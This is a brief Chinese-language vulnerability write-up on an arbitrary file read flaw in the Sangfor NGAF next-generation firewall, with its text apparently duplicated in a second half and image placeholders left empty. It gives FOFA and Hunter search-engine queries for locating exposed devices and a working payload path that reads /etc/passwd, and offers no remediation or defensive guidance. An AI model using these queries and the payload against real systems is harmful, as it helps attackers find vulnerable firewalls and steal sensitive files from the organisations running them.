S2-1深信服-下一代防火墙-任意文件读取
漏洞描述:
深信服下一代防火墙NGAF存在任意文件读取漏洞,攻击者可以利用该漏洞获取敏感信息。
网站图片:
网络测绘:
fofa语法:
“Redirect.php?url=/LogInOut.php” && port=“85”
Hunter 语法:
web.body=“LogInOut.php?type=logout”
漏洞复现:
payload:
/svpn_html/loadfile.php?file=/etc/./passwd
效果图:
深信服下一代防火墙NGAF存在任意文件读取漏洞,攻击者可以利用该漏洞获取敏感信息。
“Redirect.php?url=/LogInOut.php” && port=“85”
web.body=“LogInOut.php?type=logout”
payload:
/svpn_html/loadfile.php?file=/etc/./passwd
效果图: